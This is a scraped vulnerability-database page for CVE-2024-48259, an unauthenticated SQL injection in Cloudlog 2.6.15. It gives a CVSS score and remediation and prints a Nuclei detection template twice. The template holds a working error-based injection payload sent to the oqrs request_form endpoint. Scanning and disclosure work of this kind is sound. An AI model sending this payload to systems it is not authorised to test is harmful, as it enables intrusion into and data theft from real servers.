Cloudlog - SQL Injection

CVE-2024-48259

Verified

Description

Cloudlog 2.6.15 contains a SQL injection caused by unsanitized input in oqrs.php request_form, letting attackers execute arbitrary SQL commands via station_id or callsign, exploit requires sending crafted request.

Severity

High

CVSS Score

7.3

Exploit Probability

Affected Product

cloudlog

Published Date

May 11, 2026

Template Author

s4e-io

CVE-2024-48259.yaml

id: CVE-2024-48259

info:
  name: Cloudlog - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Cloudlog 2.6.15 contains a SQL injection caused by unsanitized input in oqrs.php request_form, letting attackers execute arbitrary SQL commands via station_id or callsign, exploit requires sending crafted request.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of Cloudlog where this issue is fixed, or sanitize inputs properly.
  reference:
    - https://chiggerlor.substack.com/p/unauthenticated-sql-injection-in-9a3
    - https://github.com/magicbug/Cloudlog
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48259
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-48259
    epss-score: 0.04818
    epss-percentile: 0.89783
    cwe-id: CWE-89
    cpe: cpe:2.3:a:magicbug:cloudlog:2.6.15:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magicbug
    product: cloudlog
    fofa-query: "Login - Cloudlog"
  tags: cve,cve2024,cloudlog,sqli,vuln,unauth

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php/oqrs/request_form HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,md5({{num}}),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "A Database Error Occurred", "{{md5({{num}})}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a0047304502207da8f485959c479dfa5e070e3a80cfd0b6e1ab59e5958b869b4c9fe0aeba44cb022100dc0059d8af1f8045d6321d69887bec48b4d86fb7791e65a981434d97eda48224:922c64590222798bb761d5b6d8e72950

7.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE ID:

cve-2024-48259

CWE ID:

cwe-89

References

https://chiggerlor.substack.com/p/unauthenticated-sql-injection-in-9a3 https://github.com/magicbug/Cloudlog https://nvd.nist.gov/vuln/detail/CVE-2024-48259

Remediation Steps

Update to the latest version of Cloudlog where this issue is fixed, or sanitize inputs properly.

id: CVE-2024-48259

info:
  name: Cloudlog - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Cloudlog 2.6.15 contains a SQL injection caused by unsanitized input in oqrs.php request_form, letting attackers execute arbitrary SQL commands via station_id or callsign, exploit requires sending crafted request.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of Cloudlog where this issue is fixed, or sanitize inputs properly.
  reference:
    - https://chiggerlor.substack.com/p/unauthenticated-sql-injection-in-9a3
    - https://github.com/magicbug/Cloudlog
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48259
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-48259
    epss-score: 0.04818
    epss-percentile: 0.89783
    cwe-id: CWE-89
    cpe: cpe:2.3:a:magicbug:cloudlog:2.6.15:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magicbug
    product: cloudlog
    fofa-query: "Login - Cloudlog"
  tags: cve,cve2024,cloudlog,sqli,vuln,unauth

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php/oqrs/request_form HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,md5({{num}}),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "A Database Error Occurred", "{{md5({{num}})}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a0047304502207da8f485959c479dfa5e070e3a80cfd0b6e1ab59e5958b869b4c9fe0aeba44cb022100dc0059d8af1f8045d6321d69887bec48b4d86fb7791e65a981434d97eda48224:922c64590222798bb761d5b6d8e72950

Cloudlog - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Cloudlog - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps